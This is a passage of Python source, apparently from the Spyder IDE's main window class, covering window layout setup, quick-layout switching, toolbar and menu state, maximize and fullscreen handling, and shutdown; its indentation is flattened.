# In MacOS X 10.7 our app is not displayed after initialized (I don't
# know why because this doesn't happen when started from the terminal),
# so we need to resort to this hack to make it appear.
if running_in_mac_app():
idx = __file__.index(MAC_APP_NAME)
app_path = __file__[:idx]
subprocess.call(['open', app_path + MAC_APP_NAME])
# Server to maintain just one Spyder instance and open files in it if
# the user tries to start other instances with
# $ spyder foo.py
if (CONF.get('main', 'single_instance') and not self.new_instance
and self.open_files_server):
t = threading.Thread(target=self.start_open_files_server)
t.setDaemon(True)
t.start()
# Connect the window to the signal emmited by the previous server
# when it gets a client connected to it
self.sig_open_external_file.connect(self.open_external_file)
# Create Plugins and toolbars submenus
self.create_plugins_menu()
self.create_toolbars_menu()
# Update toolbar visibility status
self.toolbars_visible = CONF.get('main', 'toolbars_visible')
self.load_last_visible_toolbars()
# Update lock status
self.lock_interface_action.setChecked(self.interface_locked)
# Hide Internal Console so that people don't use it instead of
# the External or IPython ones
if self.console.dockwidget.isVisible() and DEV is None:
self.console.toggle_view_action.setChecked(False)
self.console.dockwidget.hide()
# Show Help and Consoles by default
plugins_to_show = [self.ipyconsole]
if self.help is not None:
plugins_to_show.append(self.help)
for plugin in plugins_to_show:
if plugin.dockwidget.isVisible():
plugin.dockwidget.raise_()
# Show history file if no console is visible
if not self.ipyconsole.isvisible:
self.historylog.add_history(get_conf_path('history.py'))
if self.open_project:
self.projects.open_project(self.open_project)
else:
# Load last project if a project was active when Spyder
# was closed
self.projects.reopen_last_project()
# If no project is active, load last session
if self.projects.get_active_project() is None:
self.editor.setup_open_files()
# Check for spyder updates
if DEV is None and CONF.get('main', 'check_updates_on_startup'):
self.give_updates_feedback = False
self.check_updates(startup=True)
# Show dialog with missing dependencies
self.report_missing_dependencies()
# Raise the menuBar to the top of the main window widget's stack
# (Fixes issue 3887)
self.menuBar().raise_()
self.is_setting_up = False
def set_window_title(self):
"""Set window title."""
if DEV is not None:
title = u"Spyder %s (Python %s.%s)" % (__version__,
sys.version_info[0],
sys.version_info[1])
else:
title = u"Spyder (Python %s.%s)" % (sys.version_info[0],
sys.version_info[1])
if get_debug_level():
title += u" [DEBUG MODE %d]" % get_debug_level()
if self.window_title is not None:
title += u' -- ' + to_text_string(self.window_title)
if self.projects is not None:
path = self.projects.get_active_project_path()
if path:
path = path.replace(get_home_dir(), u'~')
title = u'{0} - {1}'.format(path, title)
self.base_title = title
self.setWindowTitle(self.base_title)
def report_missing_dependencies(self):
"""Show a QMessageBox with a list of missing hard dependencies"""
missing_deps = dependencies.missing_dependencies()
if missing_deps:
QMessageBox.critical(self, _('Error'),
_("<b>You have missing dependencies!</b>"
"<br><br><tt>%s</tt><br><br>"
"<b>Please install them to avoid this message.</b>"
"<br><br>"
"<i>Note</i>: Spyder could work without some of these "
"dependencies, however to have a smooth experience when "
"using Spyder we <i>strongly</i> recommend you to install "
"all the listed missing dependencies.<br><br>"
"Failing to install these dependencies might result in bugs. "
"Please be sure that any found bugs are not the direct "
"result of missing dependencies, prior to reporting a new "
"issue."
) % missing_deps, QMessageBox.Ok)
def load_window_settings(self, prefix, default=False, section='main'):
"""Load window layout settings from userconfig-based configuration
with *prefix*, under *section*
default: if True, do not restore inner layout"""
get_func = CONF.get_default if default else CONF.get
window_size = get_func(section, prefix+'size')
prefs_dialog_size = get_func(section, prefix+'prefs_dialog_size')
if default:
hexstate = None
else:
hexstate = get_func(section, prefix+'state', None)
pos = get_func(section, prefix+'position')
# It's necessary to verify if the window/position value is valid
# with the current screen. See issue 3748
width = pos[0]
height = pos[1]
screen_shape = QApplication.desktop().geometry()
current_width = screen_shape.width()
current_height = screen_shape.height()
if current_width < width or current_height < height:
pos = CONF.get_default(section, prefix+'position')
is_maximized = get_func(section, prefix+'is_maximized')
is_fullscreen = get_func(section, prefix+'is_fullscreen')
return hexstate, window_size, prefs_dialog_size, pos, is_maximized, \
is_fullscreen
def get_window_settings(self):
"""Return current window settings
Symetric to the 'set_window_settings' setter"""
window_size = (self.window_size.width(), self.window_size.height())
is_fullscreen = self.isFullScreen()
if is_fullscreen:
is_maximized = self.maximized_flag
else:
is_maximized = self.isMaximized()
pos = (self.window_position.x(), self.window_position.y())
prefs_dialog_size = (self.prefs_dialog_size.width(),
self.prefs_dialog_size.height())
hexstate = qbytearray_to_str(self.saveState())
return (hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen)
def set_window_settings(self, hexstate, window_size, prefs_dialog_size,
pos, is_maximized, is_fullscreen):
"""Set window settings
Symetric to the 'get_window_settings' accessor"""
self.setUpdatesEnabled(False)
self.window_size = QSize(window_size[0], window_size[1]) # width,height
self.prefs_dialog_size = QSize(prefs_dialog_size[0],
prefs_dialog_size[1]) # width,height
self.window_position = QPoint(pos[0], pos[1]) # x,y
self.setWindowState(Qt.WindowNoState)
self.resize(self.window_size)
self.move(self.window_position)
# Window layout
if hexstate:
self.restoreState( QByteArray().fromHex(
str(hexstate).encode('utf-8')) )
# [Workaround for Issue 880]
# QDockWidget objects are not painted if restored as floating
# windows, so we must dock them before showing the mainwindow.
for widget in self.children():
if isinstance(widget, QDockWidget) and widget.isFloating():
self.floating_dockwidgets.append(widget)
widget.setFloating(False)
# Is fullscreen?
if is_fullscreen:
self.setWindowState(Qt.WindowFullScreen)
self.__update_fullscreen_action()
# Is maximized?
if is_fullscreen:
self.maximized_flag = is_maximized
elif is_maximized:
self.setWindowState(Qt.WindowMaximized)
self.setUpdatesEnabled(True)
def save_current_window_settings(self, prefix, section='main',
none_state=False):
"""Save current window settings with *prefix* in
the userconfig-based configuration, under *section*"""
win_size = self.window_size
prefs_size = self.prefs_dialog_size
CONF.set(section, prefix+'size', (win_size.width(), win_size.height()))
CONF.set(section, prefix+'prefs_dialog_size',
(prefs_size.width(), prefs_size.height()))
CONF.set(section, prefix+'is_maximized', self.isMaximized())
CONF.set(section, prefix+'is_fullscreen', self.isFullScreen())
pos = self.window_position
CONF.set(section, prefix+'position', (pos.x(), pos.y()))
self.maximize_dockwidget(restore=True)# Restore non-maximized layout
if none_state:
CONF.set(section, prefix + 'state', None)
else:
qba = self.saveState()
CONF.set(section, prefix + 'state', qbytearray_to_str(qba))
CONF.set(section, prefix+'statusbar',
not self.statusBar().isHidden())
def tabify_plugins(self, first, second):
"""Tabify plugin dockwigdets"""
self.tabifyDockWidget(first.dockwidget, second.dockwidget)
# --- Layouts
def setup_layout(self, default=False):
"""Setup window layout"""
prefix = 'window' + '/'
settings = self.load_window_settings(prefix, default)
hexstate = settings[0]
self.first_spyder_run = False
if hexstate is None:
# First Spyder execution:
self.setWindowState(Qt.WindowMaximized)
self.first_spyder_run = True
self.setup_default_layouts('default', settings)
# Now that the initial setup is done, copy the window settings,
# except for the hexstate in the quick layouts sections for the
# default layouts.
# Order and name of the default layouts is found in config.py
section = 'quick_layouts'
get_func = CONF.get_default if default else CONF.get
order = get_func(section, 'order')
# restore the original defaults if reset layouts is called
if default:
CONF.set(section, 'active', order)
CONF.set(section, 'order', order)
CONF.set(section, 'names', order)
for index, name, in enumerate(order):
prefix = 'layout_{0}/'.format(index)
self.save_current_window_settings(prefix, section,
none_state=True)
# store the initial layout as the default in spyder
prefix = 'layout_default/'
section = 'quick_layouts'
self.save_current_window_settings(prefix, section, none_state=True)
self.current_quick_layout = 'default'
# Regenerate menu
self.quick_layout_set_menu()
self.set_window_settings(*settings)
for plugin in (self.widgetlist + self.thirdparty_plugins):
try:
plugin.initialize_plugin_in_mainwindow_layout()
except Exception as error:
print("%s: %s" % (plugin, str(error)), file=STDERR)
traceback.print_exc(file=STDERR)
def setup_default_layouts(self, index, settings):
"""Setup default layouts when run for the first time."""
self.setUpdatesEnabled(False)
first_spyder_run = bool(self.first_spyder_run) # Store copy
if first_spyder_run:
self.set_window_settings(*settings)
else:
if self.last_plugin:
if self.last_plugin.ismaximized:
self.maximize_dockwidget(restore=True)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
min_width = self.minimumWidth()
max_width = self.maximumWidth()
base_width = self.width()
self.setFixedWidth(base_width)
# IMPORTANT: order has to be the same as defined in the config file
MATLAB, RSTUDIO, VERTICAL, HORIZONTAL = range(self.DEFAULT_LAYOUTS)
# Define widgets locally
editor = self.editor
console_ipy = self.ipyconsole
console_int = self.console
outline = self.outlineexplorer
explorer_project = self.projects
explorer_file = self.explorer
explorer_variable = self.variableexplorer
plots = self.plots
history = self.historylog
finder = self.findinfiles
help_plugin = self.help
helper = self.onlinehelp
plugins = self.thirdparty_plugins
# Stored for tests
global_hidden_widgets = [finder, console_int, explorer_project,
helper] + plugins
global_hidden_toolbars = [self.source_toolbar, self.edit_toolbar,
self.search_toolbar]
# Layout definition
# --------------------------------------------------------------------
# Layouts are organized by columns, each column is organized by rows.
# Widths have to add 1.0 (except if hidden), height per column has to
# add 1.0 as well
# Spyder Default Initial Layout
s_layout = {
'widgets': [
# Column 0
[[explorer_project]],
# Column 1
[[editor]],
# Column 2
[[outline]],
# Column 3
[[help_plugin, explorer_variable, plots, # Row 0
helper, explorer_file, finder] + plugins,
[console_int, console_ipy, history]] # Row 1
],
'width fraction': [0.05, # Column 0 width
0.55, # Column 1 width
0.05, # Column 2 width
0.45], # Column 3 width
'height fraction': [[1.0], # Column 0, row heights
[1.0], # Column 1, row heights
[1.0], # Column 2, row heights
[0.46, 0.54]], # Column 3, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# RStudio
r_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int]], # Row 1
# column 1
[[explorer_variable, plots, history, # Row 0
outline, finder] + plugins,
[explorer_file, explorer_project, # Row 1
help_plugin, helper]]
],
'width fraction': [0.55, # Column 0 width
0.45], # Column 1 width
'height fraction': [[0.55, 0.45], # Column 0, row heights
[0.55, 0.45]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Matlab
m_layout = {
'widgets': [
# column 0
[[explorer_file, explorer_project],
[outline]],
# column 1
[[editor],
[console_ipy, console_int]],
# column 2
[[explorer_variable, plots, finder] + plugins,
[history, help_plugin, helper]]
],
'width fraction': [0.10, # Column 0 width
0.45, # Column 1 width
0.45], # Column 2 width
'height fraction': [[0.55, 0.45], # Column 0, row heights
[0.55, 0.45], # Column 1, row heights
[0.55, 0.45]], # Column 2, row heights
'hidden widgets': global_hidden_widgets,
'hidden toolbars': [],
}
# Vertically split
v_layout = {
'widgets': [
# column 0
[[editor], # Row 0
[console_ipy, console_int, explorer_file, # Row 1
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [1.0], # Column 0 width
'height fraction': [[0.55, 0.45]], # Column 0, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': [],
}
# Horizontally split
h_layout = {
'widgets': [
# column 0
[[editor]], # Row 0
# column 1
[[console_ipy, console_int, explorer_file, # Row 0
explorer_project, help_plugin, explorer_variable, plots,
history, outline, finder, helper] + plugins]
],
'width fraction': [0.55, # Column 0 width
0.45], # Column 1 width
'height fraction': [[1.0], # Column 0, row heights
[1.0]], # Column 1, row heights
'hidden widgets': [outline] + global_hidden_widgets,
'hidden toolbars': []
}
# Layout selection
layouts = {
'default': s_layout,
RSTUDIO: r_layout,
MATLAB: m_layout,
VERTICAL: v_layout,
HORIZONTAL: h_layout,
}
layout = layouts[index]
# Remove None from widgets layout
widgets_layout = layout['widgets']
widgets_layout_clean = []
for column in widgets_layout:
clean_col = []
for row in column:
clean_row = [w for w in row if w is not None]
if clean_row:
clean_col.append(clean_row)
if clean_col:
widgets_layout_clean.append(clean_col)
# Flatten widgets list
widgets = []
for column in widgets_layout_clean:
for row in column:
for widget in row:
widgets.append(widget)
# Make every widget visible
for widget in widgets:
widget.toggle_view(True)
widget.toggle_view_action.setChecked(True)
# We use both directions to ensure proper update when moving from
# 'Horizontal Split' to 'Spyder Default'
# This also seems to help on random cases where the display seems
# 'empty'
for direction in (Qt.Vertical, Qt.Horizontal):
# Arrange the widgets in one direction
for idx in range(len(widgets) - 1):
first, second = widgets[idx], widgets[idx+1]
if first is not None and second is not None:
self.splitDockWidget(first.dockwidget, second.dockwidget,
direction)
# Arrange the widgets in the other direction
for column in widgets_layout_clean:
for idx in range(len(column) - 1):
first_row, second_row = column[idx], column[idx+1]
self.splitDockWidget(first_row[0].dockwidget,
second_row[0].dockwidget,
Qt.Vertical)
# Tabify
for column in widgets_layout_clean:
for row in column:
for idx in range(len(row) - 1):
first, second = row[idx], row[idx+1]
self.tabify_plugins(first, second)
# Raise front widget per row
row[0].dockwidget.show()
row[0].dockwidget.raise_()
# Set dockwidget widths
width_fractions = layout['width fraction']
if len(width_fractions) > 1:
_widgets = [col[0][0].dockwidget for col in widgets_layout]
self.resizeDocks(_widgets, width_fractions, Qt.Horizontal)
# Set dockwidget heights
height_fractions = layout['height fraction']
for idx, column in enumerate(widgets_layout_clean):
if len(column) > 1:
_widgets = [row[0].dockwidget for row in column]
self.resizeDocks(_widgets, height_fractions[idx], Qt.Vertical)
# Hide toolbars
hidden_toolbars = global_hidden_toolbars + layout['hidden toolbars']
for toolbar in hidden_toolbars:
if toolbar is not None:
toolbar.close()
# Hide widgets
hidden_widgets = layout['hidden widgets']
for widget in hidden_widgets:
if widget is not None:
widget.dockwidget.close()
if first_spyder_run:
self.first_spyder_run = False
else:
self.setMinimumWidth(min_width)
self.setMaximumWidth(max_width)
if not (self.isMaximized() or self.maximized_flag):
self.showMaximized()
self.setUpdatesEnabled(True)
self.sig_layout_setup_ready.emit(layout)
return layout
@Slot()
def toggle_previous_layout(self):
""" """
self.toggle_layout('previous')
@Slot()
def toggle_next_layout(self):
""" """
self.toggle_layout('next')
def toggle_layout(self, direction='next'):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
if len(active) == 0:
return
layout_index = ['default']
for name in order:
if name in active:
layout_index.append(names.index(name))
current_layout = self.current_quick_layout
dic = {'next': 1, 'previous': -1}
if current_layout is None:
# Start from default
current_layout = 'default'
if current_layout in layout_index:
current_index = layout_index.index(current_layout)
else:
current_index = 0
new_index = (current_index + dic[direction]) % len(layout_index)
self.quick_layout_switch(layout_index[new_index])
def quick_layout_set_menu(self):
""" """
get = CONF.get
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
ql_actions = []
ql_actions = [create_action(self, _('Spyder Default Layout'),
triggered=lambda:
self.quick_layout_switch('default'))]
for name in order:
if name in active:
index = names.index(name)
# closure required so lambda works with the default parameter
def trigger(i=index, self=self):
return lambda: self.quick_layout_switch(i)
qli_act = create_action(self, name, triggered=trigger())
# closure above replaces the following which stopped working
# qli_act = create_action(self, name, triggered=lambda i=index:
# self.quick_layout_switch(i)
ql_actions += [qli_act]
self.ql_save = create_action(self, _("Save current layout"),
triggered=lambda:
self.quick_layout_save(),
context=Qt.ApplicationShortcut)
self.ql_preferences = create_action(self, _("Layout preferences"),
triggered=lambda:
self.quick_layout_settings(),
context=Qt.ApplicationShortcut)
self.ql_reset = create_action(self, _('Reset to spyder default'),
triggered=self.reset_window_layout)
self.register_shortcut(self.ql_save, "_", "Save current layout")
self.register_shortcut(self.ql_preferences, "_", "Layout preferences")
ql_actions += [None]
ql_actions += [self.ql_save, self.ql_preferences, self.ql_reset]
self.quick_layout_menu.clear()
add_actions(self.quick_layout_menu, ql_actions)
if len(order) == 0:
self.ql_preferences.setEnabled(False)
else:
self.ql_preferences.setEnabled(True)
@Slot()
def reset_window_layout(self):
"""Reset window layout to default"""
answer = QMessageBox.warning(self, _("Warning"),
_("Window layout will be reset to default settings: "
"this affects window position, size and dockwidgets.\n"
"Do you want to continue?"),
QMessageBox.Yes | QMessageBox.No)
if answer == QMessageBox.Yes:
self.setup_layout(default=True)
def quick_layout_save(self):
"""Save layout dialog"""
get = CONF.get
set_ = CONF.set
names = get('quick_layouts', 'names')
order = get('quick_layouts', 'order')
active = get('quick_layouts', 'active')
dlg = self.dialog_layout_save(self, names)
if dlg.exec_():
name = dlg.combo_box.currentText()
if name in names:
answer = QMessageBox.warning(self, _("Warning"),
_("Layout <b>%s</b> will be \
overwritten. Do you want to \
continue?") % name,
QMessageBox.Yes | QMessageBox.No)
index = order.index(name)
else:
answer = True
if None in names:
index = names.index(None)
names[index] = name
else:
index = len(names)
names.append(name)
order.append(name)
# Always make active a new layout even if it overwrites an inactive
# layout
if name not in active:
active.append(name)
if answer:
self.save_current_window_settings('layout_{}/'.format(index),
section='quick_layouts')
set_('quick_layouts', 'names', names)
set_('quick_layouts', 'order', order)
set_('quick_layouts', 'active', active)
self.quick_layout_set_menu()
def quick_layout_settings(self):
"""Layout settings dialog"""
get = CONF.get
set_ = CONF.set
section = 'quick_layouts'
names = get(section, 'names')
order = get(section, 'order')
active = get(section, 'active')
dlg = self.dialog_layout_settings(self, names, order, active)
if dlg.exec_():
set_(section, 'names', dlg.names)
set_(section, 'order', dlg.order)
set_(section, 'active', dlg.active)
self.quick_layout_set_menu()
def quick_layout_switch(self, index):
"""Switch to quick layout number *index*"""
section = 'quick_layouts'
try:
settings = self.load_window_settings('layout_{}/'.format(index),
section=section)
(hexstate, window_size, prefs_dialog_size, pos, is_maximized,
is_fullscreen) = settings
# The defaults layouts will always be regenerated unless there was
# an overwrite, either by rewriting with same name, or by deleting
# and then creating a new one
if hexstate is None:
# The value for hexstate shouldn't be None for a custom saved
# layout (ie, where the index is greater than the number of
# defaults). See issue 6202.
if index != 'default' and index >= self.DEFAULT_LAYOUTS:
QMessageBox.critical(
self, _("Warning"),
_("Error opening the custom layout. Please close"
" Spyder and try again. If the issue persists,"
" then you must use 'Reset to Spyder default' "
"from the layout menu."))
return
self.setup_default_layouts(index, settings)
except cp.NoOptionError:
QMessageBox.critical(self, _("Warning"),
_("Quick switch layout #%s has not yet "
"been defined.") % str(index))
return
# TODO: is there any real use in calling the previous layout
# setting?
# self.previous_layout_settings = self.get_window_settings()
self.set_window_settings(*settings)
self.current_quick_layout = index
# make sure the flags are correctly set for visible panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
# --- Show/Hide toolbars
def _update_show_toolbars_action(self):
"""Update the text displayed in the menu entry."""
if self.toolbars_visible:
text = _("Hide toolbars")
tip = _("Hide toolbars")
else:
text = _("Show toolbars")
tip = _("Show toolbars")
self.show_toolbars_action.setText(text)
self.show_toolbars_action.setToolTip(tip)
def save_visible_toolbars(self):
"""Saves the name of the visible toolbars in the .ini file."""
toolbars = []
for toolbar in self.visible_toolbars:
toolbars.append(toolbar.objectName())
CONF.set('main', 'last_visible_toolbars', toolbars)
def get_visible_toolbars(self):
"""Collects the visible toolbars."""
toolbars = []
for toolbar in self.toolbarslist:
if toolbar.toggleViewAction().isChecked():
toolbars.append(toolbar)
self.visible_toolbars = toolbars
def load_last_visible_toolbars(self):
"""Loads the last visible toolbars from the .ini file."""
toolbars_names = CONF.get('main', 'last_visible_toolbars', default=[])
if toolbars_names:
dic = {}
for toolbar in self.toolbarslist:
dic[toolbar.objectName()] = toolbar
toolbars = []
for name in toolbars_names:
if name in dic:
toolbars.append(dic[name])
self.visible_toolbars = toolbars
else:
self.get_visible_toolbars()
self._update_show_toolbars_action()
@Slot()
def show_toolbars(self):
"""Show/Hides toolbars."""
value = not self.toolbars_visible
CONF.set('main', 'toolbars_visible', value)
if value:
self.save_visible_toolbars()
else:
self.get_visible_toolbars()
for toolbar in self.visible_toolbars:
toolbar.toggleViewAction().setChecked(value)
toolbar.setVisible(value)
self.toolbars_visible = value
self._update_show_toolbars_action()
# --- Other
def update_execution_state_kernel(self):
"""Handle execution state of the current console."""
try:
self.ipyconsole.update_execution_state_kernel()
except AttributeError:
return
def valid_project(self):
"""Handle an invalid active project."""
try:
path = self.projects.get_active_project_path()
except AttributeError:
return
if bool(path):
if not self.projects.is_valid_project(path):
if path:
QMessageBox.critical(
self,
_('Error'),
_("<b>{}</b> is no longer a valid Spyder project! "
"Since it is the current active project, it will "
"be closed automatically.").format(path))
self.projects.close_project()
def free_memory(self):
"""Free memory after event."""
gc.collect()
def plugin_focus_changed(self):
"""Focus has changed from one plugin to another"""
self.update_edit_menu()
self.update_search_menu()
def show_shortcuts(self, menu):
"""Show action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(element._shown_shortcut)
def hide_shortcuts(self, menu):
"""Hide action shortcuts in menu"""
for element in getattr(self, menu + '_menu_actions'):
if element and isinstance(element, QAction):
if element._shown_shortcut is not None:
element.setShortcut(QKeySequence())
def get_focus_widget_properties(self):
"""Get properties of focus widget
Returns tuple (widget, properties) where properties is a tuple of
booleans: (is_console, not_readonly, readwrite_editor)"""
from spyder.plugins.editor.widgets.editor import TextEditBaseWidget
from spyder.plugins.ipythonconsole.widgets import ControlWidget
widget = QApplication.focusWidget()
textedit_properties = None
if isinstance(widget, (TextEditBaseWidget, ControlWidget)):
console = isinstance(widget, ControlWidget)
not_readonly = not widget.isReadOnly()
readwrite_editor = not_readonly and not console
textedit_properties = (console, not_readonly, readwrite_editor)
return widget, textedit_properties
def update_edit_menu(self):
"""Update edit menu"""
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Editor has focus and there is no file opened in it
if not console and not_readonly and not self.editor.is_file_opened():
return
# Disabling all actions to begin with
for child in self.edit_menu.actions():
child.setEnabled(False)
self.selectall_action.setEnabled(True)
# Undo, redo
self.undo_action.setEnabled( readwrite_editor \
and widget.document().isUndoAvailable() )
self.redo_action.setEnabled( readwrite_editor \
and widget.document().isRedoAvailable() )
# Copy, cut, paste, delete
has_selection = widget.has_selected_text()
self.copy_action.setEnabled(has_selection)
self.cut_action.setEnabled(has_selection and not_readonly)
self.paste_action.setEnabled(not_readonly)
# Comment, uncomment, indent, unindent...
if not console and not_readonly:
# This is the editor and current file is writable
for action in self.editor.edit_menu_actions:
action.setEnabled(True)
def update_search_menu(self):
"""Update search menu"""
# Disabling all actions except the last one
# (which is Find in files) to begin with
for child in self.search_menu.actions()[:-1]:
child.setEnabled(False)
widget, textedit_properties = self.get_focus_widget_properties()
if textedit_properties is None: # widget is not an editor/console
return
# !!! Below this line, widget is expected to be a QPlainTextEdit
# instance
console, not_readonly, readwrite_editor = textedit_properties
# Find actions only trigger an effect in the Editor
if not console:
for action in self.search_menu.actions():
try:
action.setEnabled(True)
except RuntimeError:
pass
# Disable the replace action for read-only files
self.search_menu_actions[3].setEnabled(readwrite_editor)
def create_plugins_menu(self):
order = ['editor', 'ipython_console', 'variable_explorer',
'help', 'plots', None, 'explorer', 'outline_explorer',
'project_explorer', 'find_in_files', None, 'historylog',
'profiler', 'breakpoints', 'pylint', None,
'onlinehelp', 'internal_console', None]
for plugin in self.widgetlist:
action = plugin.toggle_view_action
action.setChecked(plugin.dockwidget.isVisible())
try:
name = plugin.CONF_SECTION
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
actions = order[:]
for action in order:
if type(action) is str:
actions.remove(action)
self.plugins_menu_actions = actions
add_actions(self.plugins_menu, actions)
def create_toolbars_menu(self):
order = ['file_toolbar', 'run_toolbar', 'debug_toolbar',
'main_toolbar', 'Global working directory', None,
'search_toolbar', 'edit_toolbar', 'source_toolbar']
for toolbar in self.toolbarslist:
action = toolbar.toggleViewAction()
name = toolbar.objectName()
try:
pos = order.index(name)
except ValueError:
pos = None
if pos is not None:
order[pos] = action
else:
order.append(action)
add_actions(self.toolbars_menu, order)
def createPopupMenu(self):
menu = QMenu('', self)
actions = self.help_menu_actions[:3] + \
[None, self.help_menu_actions[-1]]
add_actions(menu, actions)
return menu
def set_splash(self, message):
"""Set splash message"""
if self.splash is None:
return
if message:
logger.info(message)
self.splash.show()
self.splash.showMessage(message, Qt.AlignBottom | Qt.AlignCenter |
Qt.AlignAbsolute, QColor(Qt.white))
QApplication.processEvents()
def closeEvent(self, event):
"""closeEvent reimplementation"""
if self.closing(True):
event.accept()
else:
event.ignore()
def resizeEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_size = self.size()
QMainWindow.resizeEvent(self, event)
# To be used by the tour to be able to resize
self.sig_resized.emit(event)
def moveEvent(self, event):
"""Reimplement Qt method"""
if not self.isMaximized() and not self.fullscreen_flag:
self.window_position = self.pos()
QMainWindow.moveEvent(self, event)
# To be used by the tour to be able to move
self.sig_moved.emit(event)
def hideEvent(self, event):
"""Reimplement Qt method"""
try:
for plugin in (self.widgetlist + self.thirdparty_plugins):
if plugin.isAncestorOf(self.last_focused_widget):
plugin.visibility_changed(True)
QMainWindow.hideEvent(self, event)
except RuntimeError:
QMainWindow.hideEvent(self, event)
def change_last_focused_widget(self, old, now):
"""To keep track of to the last focused widget"""
if (now is None and QApplication.activeWindow() is not None):
QApplication.activeWindow().setFocus()
self.last_focused_widget = QApplication.focusWidget()
elif now is not None:
self.last_focused_widget = now
self.previous_focused_widget = old
def closing(self, cancelable=False):
"""Exit tasks"""
if self.already_closed or self.is_starting_up:
return True
if cancelable and CONF.get('main', 'prompt_on_exit'):
reply = QMessageBox.critical(self, 'Spyder',
'Do you really want to exit?',
QMessageBox.Yes, QMessageBox.No)
if reply == QMessageBox.No:
return False
prefix = 'window' + '/'
self.save_current_window_settings(prefix)
if CONF.get('main', 'single_instance') and self.open_files_server:
self.open_files_server.close()
for plugin in (self.widgetlist + self.thirdparty_plugins):
plugin.close_window()
if not plugin.closing_plugin(cancelable):
return False
self.dialog_manager.close_all()
if self.toolbars_visible:
self.save_visible_toolbars()
self.lspmanager.shutdown()
self.already_closed = True
return True
def add_dockwidget(self, child):
"""Add QDockWidget and toggleViewAction"""
dockwidget, location = child.create_dockwidget()
if CONF.get('main', 'vertical_dockwidget_titlebars'):
dockwidget.setFeatures(dockwidget.features()|
QDockWidget.DockWidgetVerticalTitleBar)
self.addDockWidget(location, dockwidget)
self.widgetlist.append(child)
@Slot()
def close_current_dockwidget(self):
widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
if plugin.isAncestorOf(widget):
plugin.toggle_view_action.setChecked(False)
break
def toggle_lock(self, value):
"""Lock/Unlock dockwidgets and toolbars"""
self.interface_locked = value
CONF.set('main', 'panes_locked', value)
# Apply lock to panes
for plugin in (self.widgetlist + self.thirdparty_plugins):
if self.interface_locked:
if plugin.dockwidget.isFloating():
plugin.dockwidget.setFloating(False)
plugin.dockwidget.setTitleBarWidget(QWidget())
else:
plugin.dockwidget.set_title_bar()
# Apply lock to toolbars
for toolbar in self.toolbarslist:
if self.interface_locked:
toolbar.setMovable(False)
else:
toolbar.setMovable(True)
def __update_maximize_action(self):
if self.state_before_maximizing is None:
text = _("Maximize current pane")
tip = _("Maximize current pane")
icon = ima.icon('maximize')
else:
text = _("Restore current pane")
tip = _("Restore pane to its original size")
icon = ima.icon('unmaximize')
self.maximize_action.setText(text)
self.maximize_action.setIcon(icon)
self.maximize_action.setToolTip(tip)
@Slot()
@Slot(bool)
def maximize_dockwidget(self, restore=False):
"""Shortcut: Ctrl+Alt+Shift+M
First call: maximize current dockwidget
Second call (or restore=True): restore original window layout"""
if self.state_before_maximizing is None:
if restore:
return
# Select plugin to maximize
self.state_before_maximizing = self.saveState()
focus_widget = QApplication.focusWidget()
for plugin in (self.widgetlist + self.thirdparty_plugins):
plugin.dockwidget.hide()
if plugin.isAncestorOf(focus_widget):
self.last_plugin = plugin
# Only plugins that have a dockwidget are part of widgetlist,
# so last_plugin can be None after the above "for" cycle.
# For example, this happens if, after Spyder has started, focus
# is set to the Working directory toolbar (which doesn't have
# a dockwidget) and then you press the Maximize button
if self.last_plugin is None:
# Using the Editor as default plugin to maximize
self.last_plugin = self.editor
# Maximize last_plugin
self.last_plugin.dockwidget.toggleViewAction().setDisabled(True)
self.setCentralWidget(self.last_plugin)
self.last_plugin.ismaximized = True
# Workaround to solve an issue with editor's outline explorer:
# (otherwise the whole plugin is hidden and so is the outline explorer
# and the latter won't be refreshed if not visible)
self.last_plugin.show()
self.last_plugin.visibility_changed(True)
if self.last_plugin is self.editor:
# Automatically show the outline if the editor was maximized:
self.addDockWidget(Qt.RightDockWidgetArea,
self.outlineexplorer.dockwidget)
self.outlineexplorer.dockwidget.show()
else:
# Restore original layout (before maximizing current dockwidget)
self.last_plugin.dockwidget.setWidget(self.last_plugin)
self.last_plugin.dockwidget.toggleViewAction().setEnabled(True)
self.setCentralWidget(None)
self.last_plugin.ismaximized = False
self.restoreState(self.state_before_maximizing)
self.state_before_maximizing = None
self.last_plugin.get_focus_widget().setFocus()
self.__update_maximize_action()
def __update_fullscreen_action(self):
if self.fullscreen_flag:
icon = ima.icon('window_nofullscreen')
else:
icon = ima.icon('window_fullscreen')
if is_text_string(icon):
icon = get_icon(icon)
self.fullscreen_action.setIcon(icon)
@Slot()
def toggle_fullscreen(self):
if self.fullscreen_flag:
self.fullscreen_flag = False
if os.name == 'nt':
self.setWindowFlags(
self.windowFlags()
^ (Qt.FramelessWindowHint | Qt.WindowStaysOnTopHint))
self.setGeometry(self.saved_normal_geometry)
self.showNormal()
if self.maximized_flag:
self.showMaximized()
else:
self.maximized_flag = self.isMaximized()
self.fullscreen_flag = True
self.saved_normal_geometry = self.normalGeometry()
if os.name == 'nt':
# Due to limitations of the Windows DWM, compositing is not
# handled correctly for OpenGL based windows when going into
# full screen mode, so we need to use this workaround.
# See Issue #4291.
self.setWindowFlags(self.windowFlags()
